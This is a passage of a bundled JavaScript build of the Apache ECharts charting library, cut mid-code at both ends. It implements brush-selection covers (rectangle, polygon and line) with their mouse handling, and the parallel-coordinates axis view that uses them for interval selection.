[brushOption.z]\n     */\n    enableBrush: function (brushOption) {\n        if (__DEV__) {\n            assert$1(this._mounted);\n        }\n\n        this._brushType && doDisableBrush(this);\n        brushOption.brushType && doEnableBrush(this, brushOption);\n\n        return this;\n    },\n\n    /**\n     * @param {Array.<Object>} panelOpts If not pass, it is global brush.\n     *        Each items: {\n     *            panelId, // mandatory.\n     *            clipPath, // mandatory. function.\n     *            isTargetByCursor, // mandatory. function.\n     *            defaultBrushType, // optional, only used when brushType is 'auto'.\n     *            getLinearBrushOtherExtent, // optional. function.\n     *        }\n     */\n    setPanels: function (panelOpts) {\n        if (panelOpts && panelOpts.length) {\n            var panels = this._panels = {};\n            each$1(panelOpts, function (panelOpts) {\n                panels[panelOpts.panelId] = clone(panelOpts);\n            });\n        }\n        else {\n            this._panels = null;\n        }\n        return this;\n    },\n\n    /**\n     * @param {Object} [opt]\n     * @return {boolean} [opt.enableGlobalPan=false]\n     */\n    mount: function (opt) {\n        opt = opt || {};\n\n        if (__DEV__) {\n            this._mounted = true; // should be at first.\n        }\n\n        this._enableGlobalPan = opt.enableGlobalPan;\n\n        var thisGroup = this.group;\n        this._zr.add(thisGroup);\n\n        thisGroup.attr({\n            position: opt.position || [0, 0],\n            rotation: opt.rotation || 0,\n            scale: opt.scale || [1, 1]\n        });\n        this._transform = thisGroup.getLocalTransform();\n\n        return this;\n    },\n\n    eachCover: function (cb, context) {\n        each$12(this._covers, cb, context);\n    },\n\n    /**\n     * Update covers.\n     * @param {Array.<Object>} brushOptionList Like:\n     *        [\n     *            {id: 'xx', brushType: 'line', range: [23, 44], brushStyle, transformable},\n     *            {id: 'yy', brushType: 'rect', range: [[23, 44], [23, 54]]},\n     *            ...\n     *        ]\n     *        `brushType` is required in each cover info. (can not be 'auto')\n     *        `id` is not mandatory.\n     *        `brushStyle`, `transformable` is not mandatory, use DEFAULT_BRUSH_OPT by default.\n     *        If brushOptionList is null/undefined, all covers removed.\n     */\n    updateCovers: function (brushOptionList) {\n        if (__DEV__) {\n            assert$1(this._mounted);\n        }\n\n        brushOptionList = map(brushOptionList, function (brushOption) {\n            return merge(clone(DEFAULT_BRUSH_OPT), brushOption, true);\n        });\n\n        var tmpIdPrefix = '\\0-brush-index-';\n        var oldCovers = this._covers;\n        var newCovers = this._covers = [];\n        var controller = this;\n        var creatingCover = this._creatingCover;\n\n        (new DataDiffer(oldCovers, brushOptionList, oldGetKey, getKey))\n            .add(addOrUpdate)\n            .update(addOrUpdate)\n            .remove(remove)\n            .execute();\n\n        return this;\n\n        function getKey(brushOption, index) {\n            return (brushOption.id != null ? brushOption.id : tmpIdPrefix + index)\n                + '-' + brushOption.brushType;\n        }\n\n        function oldGetKey(cover, index) {\n            return getKey(cover.__brushOption, index);\n        }\n\n        function addOrUpdate(newIndex, oldIndex) {\n            var newBrushOption = brushOptionList[newIndex];\n            // Consider setOption in event listener of brushSelect,\n            // where updating cover when creating should be forbiden.\n            if (oldIndex != null && oldCovers[oldIndex] === creatingCover) {\n                newCovers[newIndex] = oldCovers[oldIndex];\n            }\n            else {\n                var cover = newCovers[newIndex] = oldIndex != null\n                    ? (\n                        oldCovers[oldIndex].__brushOption = newBrushOption,\n                        oldCovers[oldIndex]\n                    )\n                    : endCreating(controller, createCover(controller, newBrushOption));\n                updateCoverAfterCreation(controller, cover);\n            }\n        }\n\n        function remove(oldIndex) {\n            if (oldCovers[oldIndex] !== creatingCover) {\n                controller.group.remove(oldCovers[oldIndex]);\n            }\n        }\n    },\n\n    unmount: function () {\n        if (__DEV__) {\n            if (!this._mounted) {\n                return;\n            }\n        }\n\n        this.enableBrush(false);\n\n        // container may 'removeAll' outside.\n        clearCovers(this);\n        this._zr.remove(this.group);\n\n        if (__DEV__) {\n            this._mounted = false; // should be at last.\n        }\n\n        return this;\n    },\n\n    dispose: function () {\n        this.unmount();\n        this.off();\n    }\n};\n\nmixin(BrushController, Eventful);\n\nfunction doEnableBrush(controller, brushOption) {\n    var zr = controller._zr;\n\n    // Consider roam, which takes globalPan too.\n    if (!controller._enableGlobalPan) {\n        take(zr, MUTEX_RESOURCE_KEY, controller._uid);\n    }\n\n    mountHandlers(zr, controller._handlers);\n\n    controller._brushType = brushOption.brushType;\n    controller._brushOption = merge(clone(DEFAULT_BRUSH_OPT), brushOption, true);\n}\n\nfunction doDisableBrush(controller) {\n    var zr = controller._zr;\n\n    release(zr, MUTEX_RESOURCE_KEY, controller._uid);\n\n    unmountHandlers(zr, controller._handlers);\n\n    controller._brushType = controller._brushOption = null;\n}\n\nfunction mountHandlers(zr, handlers) {\n    each$12(handlers, function (handler, eventName) {\n        zr.on(eventName, handler);\n    });\n}\n\nfunction unmountHandlers(zr, handlers) {\n    each$12(handlers, function (handler, eventName) {\n        zr.off(eventName, handler);\n    });\n}\n\nfunction createCover(controller, brushOption) {\n    var cover = coverRenderers[brushOption.brushType].createCover(controller, brushOption);\n    cover.__brushOption = brushOption;\n    updateZ$1(cover, brushOption);\n    controller.group.add(cover);\n    return cover;\n}\n\nfunction endCreating(controller, creatingCover) {\n    var coverRenderer = getCoverRenderer(creatingCover);\n    if (coverRenderer.endCreating) {\n        coverRenderer.endCreating(controller, creatingCover);\n        updateZ$1(creatingCover, creatingCover.__brushOption);\n    }\n    return creatingCover;\n}\n\nfunction updateCoverShape(controller, cover) {\n    var brushOption = cover.__brushOption;\n    getCoverRenderer(cover).updateCoverShape(\n        controller, cover, brushOption.range, brushOption\n    );\n}\n\nfunction updateZ$1(cover, brushOption) {\n    var z = brushOption.z;\n    z == null && (z = COVER_Z);\n    cover.traverse(function (el) {\n        el.z = z;\n        el.z2 = z; // Consider in given container.\n    });\n}\n\nfunction updateCoverAfterCreation(controller, cover) {\n    getCoverRenderer(cover).updateCommon(controller, cover);\n    updateCoverShape(controller, cover);\n}\n\nfunction getCoverRenderer(cover) {\n    return coverRenderers[cover.__brushOption.brushType];\n}\n\n// return target panel or `true` (means global panel)\nfunction getPanelByPoint(controller, e, localCursorPoint) {\n    var panels = controller._panels;\n    if (!panels) {\n        return true; // Global panel\n    }\n    var panel;\n    var transform = controller._transform;\n    each$12(panels, function (pn) {\n        pn.isTargetByCursor(e, localCursorPoint, transform) && (panel = pn);\n    });\n    return panel;\n}\n\n// Return a panel or true\nfunction getPanelByCover(controller, cover) {\n    var panels = controller._panels;\n    if (!panels) {\n        return true; // Global panel\n    }\n    var panelId = cover.__brushOption.panelId;\n    // User may give cover without coord sys info,\n    // which is then treated as global panel.\n    return panelId != null ? panels[panelId] : true;\n}\n\nfunction clearCovers(controller) {\n    var covers = controller._covers;\n    var originalLength = covers.length;\n    each$12(covers, function (cover) {\n        controller.group.remove(cover);\n    }, controller);\n    covers.length = 0;\n\n    return !!originalLength;\n}\n\nfunction trigger$1(controller, opt) {\n    var areas = map$2(controller._covers, function (cover) {\n        var brushOption = cover.__brushOption;\n        var range = clone(brushOption.range);\n        return {\n            brushType: brushOption.brushType,\n            panelId: brushOption.panelId,\n            range: range\n        };\n    });\n\n    controller.trigger('brush', areas, {\n        isEnd: !!opt.isEnd,\n        removeOnClick: !!opt.removeOnClick\n    });\n}\n\nfunction shouldShowCover(controller) {\n    var track = controller._track;\n\n    if (!track.length) {\n        return false;\n    }\n\n    var p2 = track[track.length - 1];\n    var p1 = track[0];\n    var dx = p2[0] - p1[0];\n    var dy = p2[1] - p1[1];\n    var dist = mathPow$2(dx * dx + dy * dy, 0.5);\n\n    return dist > UNSELECT_THRESHOLD;\n}\n\nfunction getTrackEnds(track) {\n    var tail = track.length - 1;\n    tail < 0 && (tail = 0);\n    return [track[0], track[tail]];\n}\n\nfunction createBaseRectCover(doDrift, controller, brushOption, edgeNames) {\n    var cover = new Group();\n\n    cover.add(new Rect({\n        name: 'main',\n        style: makeStyle(brushOption),\n        silent: true,\n        draggable: true,\n        cursor: 'move',\n        drift: curry$2(doDrift, controller, cover, 'nswe'),\n        ondragend: curry$2(trigger$1, controller, {isEnd: true})\n    }));\n\n    each$12(\n        edgeNames,\n        function (name) {\n            cover.add(new Rect({\n                name: name,\n                style: {opacity: 0},\n                draggable: true,\n                silent: true,\n                invisible: true,\n                drift: curry$2(doDrift, controller, cover, name),\n                ondragend: curry$2(trigger$1, controller, {isEnd: true})\n            }));\n        }\n    );\n\n    return cover;\n}\n\nfunction updateBaseRect(controller, cover, localRange, brushOption) {\n    var lineWidth = brushOption.brushStyle.lineWidth || 0;\n    var handleSize = mathMax$7(lineWidth, MIN_RESIZE_LINE_WIDTH);\n    var x = localRange[0][0];\n    var y = localRange[1][0];\n    var xa = x - lineWidth / 2;\n    var ya = y - lineWidth / 2;\n    var x2 = localRange[0][1];\n    var y2 = localRange[1][1];\n    var x2a = x2 - handleSize + lineWidth / 2;\n    var y2a = y2 - handleSize + lineWidth / 2;\n    var width = x2 - x;\n    var height = y2 - y;\n    var widtha = width + lineWidth;\n    var heighta = height + lineWidth;\n\n    updateRectShape(controller, cover, 'main', x, y, width, height);\n\n    if (brushOption.transformable) {\n        updateRectShape(controller, cover, 'w', xa, ya, handleSize, heighta);\n        updateRectShape(controller, cover, 'e', x2a, ya, handleSize, heighta);\n        updateRectShape(controller, cover, 'n', xa, ya, widtha, handleSize);\n        updateRectShape(controller, cover, 's', xa, y2a, widtha, handleSize);\n\n        updateRectShape(controller, cover, 'nw', xa, ya, handleSize, handleSize);\n        updateRectShape(controller, cover, 'ne', x2a, ya, handleSize, handleSize);\n        updateRectShape(controller, cover, 'sw', xa, y2a, handleSize, handleSize);\n        updateRectShape(controller, cover, 'se', x2a, y2a, handleSize, handleSize);\n    }\n}\n\nfunction updateCommon(controller, cover) {\n    var brushOption = cover.__brushOption;\n    var transformable = brushOption.transformable;\n\n    var mainEl = cover.childAt(0);\n    mainEl.useStyle(makeStyle(brushOption));\n    mainEl.attr({\n        silent: !transformable,\n        cursor: transformable ? 'move' : 'default'\n    });\n\n    each$12(\n        ['w', 'e', 'n', 's', 'se', 'sw', 'ne', 'nw'],\n        function (name) {\n            var el = cover.childOfName(name);\n            var globalDir = getGlobalDirection(controller, name);\n\n            el && el.attr({\n                silent: !transformable,\n                invisible: !transformable,\n                cursor: transformable ? CURSOR_MAP[globalDir] + '-resize' : null\n            });\n        }\n    );\n}\n\nfunction updateRectShape(controller, cover, name, x, y, w, h) {\n    var el = cover.childOfName(name);\n    el && el.setShape(pointsToRect(\n        clipByPanel(controller, cover, [[x, y], [x + w, y + h]])\n    ));\n}\n\nfunction makeStyle(brushOption) {\n    return defaults({strokeNoScale: true}, brushOption.brushStyle);\n}\n\nfunction formatRectRange(x, y, x2, y2) {\n    var min = [mathMin$7(x, x2), mathMin$7(y, y2)];\n    var max = [mathMax$7(x, x2), mathMax$7(y, y2)];\n\n    return [\n        [min[0], max[0]], // x range\n        [min[1], max[1]] // y range\n    ];\n}\n\nfunction getTransform$1(controller) {\n    return getTransform(controller.group);\n}\n\nfunction getGlobalDirection(controller, localDirection) {\n    if (localDirection.length > 1) {\n        localDirection = localDirection.split('');\n        var globalDir = [\n            getGlobalDirection(controller, localDirection[0]),\n            getGlobalDirection(controller, localDirection[1])\n        ];\n        (globalDir[0] === 'e' || globalDir[0] === 'w') && globalDir.reverse();\n        return globalDir.join('');\n    }\n    else {\n        var map$$1 = {w: 'left', e: 'right', n: 'top', s: 'bottom'};\n        var inverseMap = {left: 'w', right: 'e', top: 'n', bottom: 's'};\n        var globalDir = transformDirection(\n            map$$1[localDirection], getTransform$1(controller)\n        );\n        return inverseMap[globalDir];\n    }\n}\n\nfunction driftRect(toRectRange, fromRectRange, controller, cover, name, dx, dy, e) {\n    var brushOption = cover.__brushOption;\n    var rectRange = toRectRange(brushOption.range);\n    var localDelta = toLocalDelta(controller, dx, dy);\n\n    each$12(name.split(''), function (namePart) {\n        var ind = DIRECTION_MAP[namePart];\n        rectRange[ind[0]][ind[1]] += localDelta[ind[0]];\n    });\n\n    brushOption.range = fromRectRange(formatRectRange(\n        rectRange[0][0], rectRange[1][0], rectRange[0][1], rectRange[1][1]\n    ));\n\n    updateCoverAfterCreation(controller, cover);\n    trigger$1(controller, {isEnd: false});\n}\n\nfunction driftPolygon(controller, cover, dx, dy, e) {\n    var range = cover.__brushOption.range;\n    var localDelta = toLocalDelta(controller, dx, dy);\n\n    each$12(range, function (point) {\n        point[0] += localDelta[0];\n        point[1] += localDelta[1];\n    });\n\n    updateCoverAfterCreation(controller, cover);\n    trigger$1(controller, {isEnd: false});\n}\n\nfunction toLocalDelta(controller, dx, dy) {\n    var thisGroup = controller.group;\n    var localD = thisGroup.transformCoordToLocal(dx, dy);\n    var localZero = thisGroup.transformCoordToLocal(0, 0);\n\n    return [localD[0] - localZero[0], localD[1] - localZero[1]];\n}\n\nfunction clipByPanel(controller, cover, data) {\n    var panel = getPanelByCover(controller, cover);\n\n    return (panel && panel !== true)\n        ? panel.clipPath(data, controller._transform)\n        : clone(data);\n}\n\nfunction pointsToRect(points) {\n    var xmin = mathMin$7(points[0][0], points[1][0]);\n    var ymin = mathMin$7(points[0][1], points[1][1]);\n    var xmax = mathMax$7(points[0][0], points[1][0]);\n    var ymax = mathMax$7(points[0][1], points[1][1]);\n\n    return {\n        x: xmin,\n        y: ymin,\n        width: xmax - xmin,\n        height: ymax - ymin\n    };\n}\n\nfunction resetCursor(controller, e, localCursorPoint) {\n    if (\n        // Check active\n        !controller._brushType\n        // resetCursor should be always called when mouse is in zr area,\n        // but not called when mouse is out of zr area to avoid bad influence\n        // if `mousemove`, `mouseup` are triggered from `document` event.\n        || isOutsideZrArea(controller, e)\n    ) {\n        return;\n    }\n\n    var zr = controller._zr;\n    var covers = controller._covers;\n    var currPanel = getPanelByPoint(controller, e, localCursorPoint);\n\n    // Check whether in covers.\n    if (!controller._dragging) {\n        for (var i = 0; i < covers.length; i++) {\n            var brushOption = covers[i].__brushOption;\n            if (currPanel\n                && (currPanel === true || brushOption.panelId === currPanel.panelId)\n                && coverRenderers[brushOption.brushType].contain(\n                    covers[i], localCursorPoint[0], localCursorPoint[1]\n                )\n            ) {\n                // Use cursor style set on cover.\n                return;\n            }\n        }\n    }\n\n    currPanel && zr.setCursorStyle('crosshair');\n}\n\nfunction preventDefault(e) {\n    var rawE = e.event;\n    rawE.preventDefault && rawE.preventDefault();\n}\n\nfunction mainShapeContain(cover, x, y) {\n    return cover.childOfName('main').contain(x, y);\n}\n\nfunction updateCoverByMouse(controller, e, localCursorPoint, isEnd) {\n    var creatingCover = controller._creatingCover;\n    var panel = controller._creatingPanel;\n    var thisBrushOption = controller._brushOption;\n    var eventParams;\n\n    controller._track.push(localCursorPoint.slice());\n\n    if (shouldShowCover(controller) || creatingCover) {\n\n        if (panel && !creatingCover) {\n            thisBrushOption.brushMode === 'single' && clearCovers(controller);\n            var brushOption = clone(thisBrushOption);\n            brushOption.brushType = determineBrushType(brushOption.brushType, panel);\n            brushOption.panelId = panel === true ? null : panel.panelId;\n            creatingCover = controller._creatingCover = createCover(controller, brushOption);\n            controller._covers.push(creatingCover);\n        }\n\n        if (creatingCover) {\n            var coverRenderer = coverRenderers[determineBrushType(controller._brushType, panel)];\n            var coverBrushOption = creatingCover.__brushOption;\n\n            coverBrushOption.range = coverRenderer.getCreatingRange(\n                clipByPanel(controller, creatingCover, controller._track)\n            );\n\n            if (isEnd) {\n                endCreating(controller, creatingCover);\n                coverRenderer.updateCommon(controller, creatingCover);\n            }\n\n            updateCoverShape(controller, creatingCover);\n\n            eventParams = {isEnd: isEnd};\n        }\n    }\n    else if (\n        isEnd\n        && thisBrushOption.brushMode === 'single'\n        && thisBrushOption.removeOnClick\n    ) {\n        // Help user to remove covers easily, only by a tiny drag, in 'single' mode.\n        // But a single click do not clear covers, because user may have casual\n        // clicks (for example, click on other component and do not expect covers\n        // disappear).\n        // Only some cover removed, trigger action, but not every click trigger action.\n        if (getPanelByPoint(controller, e, localCursorPoint) && clearCovers(controller)) {\n            eventParams = {isEnd: isEnd, removeOnClick: true};\n        }\n    }\n\n    return eventParams;\n}\n\nfunction determineBrushType(brushType, panel) {\n    if (brushType === 'auto') {\n        if (__DEV__) {\n            assert$1(\n                panel && panel.defaultBrushType,\n                'MUST have defaultBrushType when brushType is \"atuo\"'\n            );\n        }\n        return panel.defaultBrushType;\n    }\n    return brushType;\n}\n\nvar pointerHandlers = {\n\n    mousedown: function (e) {\n        if (this._dragging) {\n            // In case some browser do not support globalOut,\n            // and release mose out side the browser.\n            handleDragEnd(this, e);\n        }\n        else if (!e.target || !e.target.draggable) {\n\n            preventDefault(e);\n\n            var localCursorPoint = this.group.transformCoordToLocal(e.offsetX, e.offsetY);\n\n            this._creatingCover = null;\n            var panel = this._creatingPanel = getPanelByPoint(this, e, localCursorPoint);\n\n            if (panel) {\n                this._dragging = true;\n                this._track = [localCursorPoint.slice()];\n            }\n        }\n    },\n\n    mousemove: function (e) {\n        var x = e.offsetX;\n        var y = e.offsetY;\n\n        var localCursorPoint = this.group.transformCoordToLocal(x, y);\n\n        resetCursor(this, e, localCursorPoint);\n\n        if (this._dragging) {\n            preventDefault(e);\n            var eventParams = updateCoverByMouse(this, e, localCursorPoint, false);\n            eventParams && trigger$1(this, eventParams);\n        }\n    },\n\n    mouseup: function (e) {\n        handleDragEnd(this, e);\n    }\n};\n\n\nfunction handleDragEnd(controller, e) {\n    if (controller._dragging) {\n        preventDefault(e);\n\n        var x = e.offsetX;\n        var y = e.offsetY;\n\n        var localCursorPoint = controller.group.transformCoordToLocal(x, y);\n        var eventParams = updateCoverByMouse(controller, e, localCursorPoint, true);\n\n        controller._dragging = false;\n        controller._track = [];\n        controller._creatingCover = null;\n\n        // trigger event shoule be at final, after procedure will be nested.\n        eventParams && trigger$1(controller, eventParams);\n    }\n}\n\nfunction isOutsideZrArea(controller, x, y) {\n    var zr = controller._zr;\n    return x < 0 || x > zr.getWidth() || y < 0 || y > zr.getHeight();\n}\n\n\n/**\n * key: brushType\n * @type {Object}\n */\nvar coverRenderers = {\n\n    lineX: getLineRenderer(0),\n\n    lineY: getLineRenderer(1),\n\n    rect: {\n        createCover: function (controller, brushOption) {\n            return createBaseRectCover(\n                curry$2(\n                    driftRect,\n                    function (range) {\n                        return range;\n                    },\n                    function (range) {\n                        return range;\n                    }\n                ),\n                controller,\n                brushOption,\n                ['w', 'e', 'n', 's', 'se', 'sw', 'ne', 'nw']\n            );\n        },\n        getCreatingRange: function (localTrack) {\n            var ends = getTrackEnds(localTrack);\n            return formatRectRange(ends[1][0], ends[1][1], ends[0][0], ends[0][1]);\n        },\n        updateCoverShape: function (controller, cover, localRange, brushOption) {\n            updateBaseRect(controller, cover, localRange, brushOption);\n        },\n        updateCommon: updateCommon,\n        contain: mainShapeContain\n    },\n\n    polygon: {\n        createCover: function (controller, brushOption) {\n            var cover = new Group();\n\n            // Do not use graphic.Polygon because graphic.Polyline do not close the\n            // border of the shape when drawing, which is a better experience for user.\n            cover.add(new Polyline({\n                name: 'main',\n                style: makeStyle(brushOption),\n                silent: true\n            }));\n\n            return cover;\n        },\n        getCreatingRange: function (localTrack) {\n            return localTrack;\n        },\n        endCreating: function (controller, cover) {\n            cover.remove(cover.childAt(0));\n            // Use graphic.Polygon close the shape.\n            cover.add(new Polygon({\n                name: 'main',\n                draggable: true,\n                drift: curry$2(driftPolygon, controller, cover),\n                ondragend: curry$2(trigger$1, controller, {isEnd: true})\n            }));\n        },\n        updateCoverShape: function (controller, cover, localRange, brushOption) {\n            cover.childAt(0).setShape({\n                points: clipByPanel(controller, cover, localRange)\n            });\n        },\n        updateCommon: updateCommon,\n        contain: mainShapeContain\n    }\n};\n\nfunction getLineRenderer(xyIndex) {\n    return {\n        createCover: function (controller, brushOption) {\n            return createBaseRectCover(\n                curry$2(\n                    driftRect,\n                    function (range) {\n                        var rectRange = [range, [0, 100]];\n                        xyIndex && rectRange.reverse();\n                        return rectRange;\n                    },\n                    function (rectRange) {\n                        return rectRange[xyIndex];\n                    }\n                ),\n                controller,\n                brushOption,\n                [['w', 'e'], ['n', 's']][xyIndex]\n            );\n        },\n        getCreatingRange: function (localTrack) {\n            var ends = getTrackEnds(localTrack);\n            var min = mathMin$7(ends[0][xyIndex], ends[1][xyIndex]);\n            var max = mathMax$7(ends[0][xyIndex], ends[1][xyIndex]);\n\n            return [min, max];\n        },\n        updateCoverShape: function (controller, cover, localRange, brushOption) {\n            var otherExtent;\n            // If brushWidth not specified, fit the panel.\n            var panel = getPanelByCover(controller, cover);\n            if (panel !== true && panel.getLinearBrushOtherExtent) {\n                otherExtent = panel.getLinearBrushOtherExtent(\n                    xyIndex, controller._transform\n                );\n            }\n            else {\n                var zr = controller._zr;\n                otherExtent = [0, [zr.getWidth(), zr.getHeight()][1 - xyIndex]];\n            }\n            var rectRange = [localRange, otherExtent];\n            xyIndex && rectRange.reverse();\n\n            updateBaseRect(controller, cover, rectRange, brushOption);\n        },\n        updateCommon: updateCommon,\n        contain: mainShapeContain\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction makeRectPanelClipPath(rect) {\n    rect = normalizeRect(rect);\n    return function (localPoints, transform) {\n        return clipPointsByRect(localPoints, rect);\n    };\n}\n\nfunction makeLinearBrushOtherExtent(rect, specifiedXYIndex) {\n    rect = normalizeRect(rect);\n    return function (xyIndex) {\n        var idx = specifiedXYIndex != null ? specifiedXYIndex : xyIndex;\n        var brushWidth = idx ? rect.width : rect.height;\n        var base = idx ? rect.x : rect.y;\n        return [base, base + (brushWidth || 0)];\n    };\n}\n\nfunction makeRectIsTargetByCursor(rect, api, targetModel) {\n    rect = normalizeRect(rect);\n    return function (e, localCursorPoint, transform) {\n        return rect.contain(localCursorPoint[0], localCursorPoint[1])\n            && !onIrrelevantElement(e, api, targetModel);\n    };\n}\n\n// Consider width/height is negative.\nfunction normalizeRect(rect) {\n    return BoundingRect.create(rect);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar elementList = ['axisLine', 'axisTickLabel', 'axisName'];\n\nvar AxisView$2 = extendComponentView({\n\n    type: 'parallelAxis',\n\n    /**\n     * @override\n     */\n    init: function (ecModel, api) {\n        AxisView$2.superApply(this, 'init', arguments);\n\n        /**\n         * @type {module:echarts/component/helper/BrushController}\n         */\n        (this._brushController = new BrushController(api.getZr()))\n            .on('brush', bind(this._onBrush, this));\n    },\n\n    /**\n     * @override\n     */\n    render: function (axisModel, ecModel, api, payload) {\n        if (fromAxisAreaSelect(axisModel, ecModel, payload)) {\n            return;\n        }\n\n        this.axisModel = axisModel;\n        this.api = api;\n\n        this.group.removeAll();\n\n        var oldAxisGroup = this._axisGroup;\n        this._axisGroup = new Group();\n        this.group.add(this._axisGroup);\n\n        if (!axisModel.get('show')) {\n            return;\n        }\n\n        var coordSysModel = getCoordSysModel(axisModel, ecModel);\n        var coordSys = coordSysModel.coordinateSystem;\n\n        var areaSelectStyle = axisModel.getAreaSelectStyle();\n        var areaWidth = areaSelectStyle.width;\n\n        var dim = axisModel.axis.dim;\n        var axisLayout = coordSys.getAxisLayout(dim);\n\n        var builderOpt = extend(\n            {strokeContainThreshold: areaWidth},\n            axisLayout\n        );\n\n        var axisBuilder = new AxisBuilder(axisModel, builderOpt);\n\n        each$1(elementList, axisBuilder.add, axisBuilder);\n\n        this._axisGroup.add(axisBuilder.getGroup());\n\n        this._refreshBrushController(\n            builderOpt, areaSelectStyle, axisModel, coordSysModel, areaWidth, api\n        );\n\n        var animationModel = (payload && payload.animation === false) ? null : axisModel;\n        groupTransition(oldAxisGroup, this._axisGroup, animationModel);\n    },\n\n    // /**\n    //  * @override\n    //  */\n    // updateVisual: function (axisModel, ecModel, api, payload) {\n    //     this._brushController && this._brushController\n    //         .updateCovers(getCoverInfoList(axisModel));\n    // },\n\n    _refreshBrushController: function (\n        builderOpt, areaSelectStyle, axisModel, coordSysModel, areaWidth, api\n    ) {\n        // After filtering, axis may change, select area needs to be update.\n        var extent = axisModel.axis.getExtent();\n        var extentLen = extent[1] - extent[0];\n        var extra = Math.min(30, Math.abs(extentLen) * 0.1); // Arbitrary value.\n\n        // width/height might be negative, which will be\n        // normalized in BoundingRect.\n        var rect = BoundingRect.create({\n            x: extent[0],\n            y: -areaWidth / 2,\n            width: extentLen,\n            height: areaWidth\n        });\n        rect.x -= extra;\n        rect.width += 2 * extra;\n\n        this._brushController\n            .mount({\n                enableGlobalPan: true,\n                rotation: builderOpt.rotation,\n                position: builderOpt.position\n            })\n            .setPanels([{\n                panelId: 'pl',\n                clipPath: makeRectPanelClipPath(rect),\n                isTargetByCursor: makeRectIsTargetByCursor(rect, api, coordSysModel),\n                getLinearBrushOtherExtent: makeLinearBrushOtherExtent(rect, 0)\n            }])\n            .enableBrush({\n                brushType: 'lineX',\n                brushStyle: areaSelectStyle,\n                removeOnClick: true\n            })\n            .updateCovers(getCoverInfoList(axisModel));\n    },\n\n    _onBrush: function (coverInfoList, opt) {\n        // Do not cache these object, because the mey be changed.\n        var axisModel = this.axisModel;\n        var axis = axisModel.axis;\n        var intervals = map(coverInfoList, function (coverInfo) {\n            return [\n                axis.coordToData(coverInfo.range[0], true),\n                axis.coordToData(coverInfo.range[1], true)\n            ];\n        });\n\n        // If realtime is true, action is not dispatched on drag end, because\n        // the drag end emits the same params with the last drag move event,\n        // and may have some delay when using touch pad.\n        if (!axisModel.option.realtime === opt.isEnd || opt.removeOnClick) { // jshint ignore:line\n            this.api.dispatchAction({\n                type: 'axisAreaSelect',\n                parallelAxisId: axisModel.id,\n                intervals: intervals\n            });\n        }\n    },\n\n    /**\n     * @override\n     */\n    dispose: function () {\n        this._brushController.dispose();\n    }\n});\n\nfunction fromAxisAreaSelect(axisModel, ecModel, payload) {\n    return payload\n        && payload.type === 'axisAreaSelect'\n        && ecModel.findComponents(\n            {mainType: 'parallelAxis', query: payload}\n        )[0] === axisModel;\n}\n\nfunction getCoverInfoList(axisModel) {\n    var axis = axisModel.axis;\n    return map(axisModel.activeIntervals, function (interval) {\n        return {\n            brushType: 'lineX',\n            panelId: 'pl',\n            range: [\n                axis.dataToCoord(interval[0], true),\n                axis.dataToCoord(interval[1], true)\n            ]\n        };\n    });\n}\n\nfunction getCoordSysModel(axisModel, ecModel) {\n    return ecModel.getComponent(\n        'parallel', axisModel.get('parallelIndex')\n    );\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar CLICK_THRESHOLD = 5; // > 4\n\n// Parallel view\nextendComponentView({\n    type: 'parallel',\n\n    render: function (parallelModel, ecModel, api) {\n        this._model = parallelModel;\n        this._api = api;\n\n        if (!this._handlers) {\n            this._handlers = {};\n            each$1(handlers, function (handler, eventName) {\n                api.getZr().on(eventName, this._handlers[eventName] = bind(handler, this));\n            }, this);\n        }\n\n        createOrUpdate(\n            this,\n            '_throttledDispatchExpand',\n            parallelModel.get('axisExpandRate'),\n            'fixRate'\n        );\n    },\n\n    dispose: function (ecModel, api) {\n        each$1(this._handlers, function (handler, eventName) {\n            api.getZr().off(eventName, handler);\n        });\n        this._handlers = null;\n    },\n\n    /**\n     * @param {Object} [opt] If null, cancle the last action triggering for debounce.\n     */\n    _throttledDispatchExpand: function (opt) {\n        this._dispatchExpand(opt);\n    },\n\n    _dispatchExpand: function (opt) {\n        opt && this._api.dispatchAction(\n            extend({type: 'parallelAxisExpand'}, opt)\n        );\n    }\n\n});\n\nvar handlers = {\n\n    mousedown: function (e) {\n        if (checkTrigger(this, 'click')) {\n            this._mouseDownPoint = [e.offsetX, 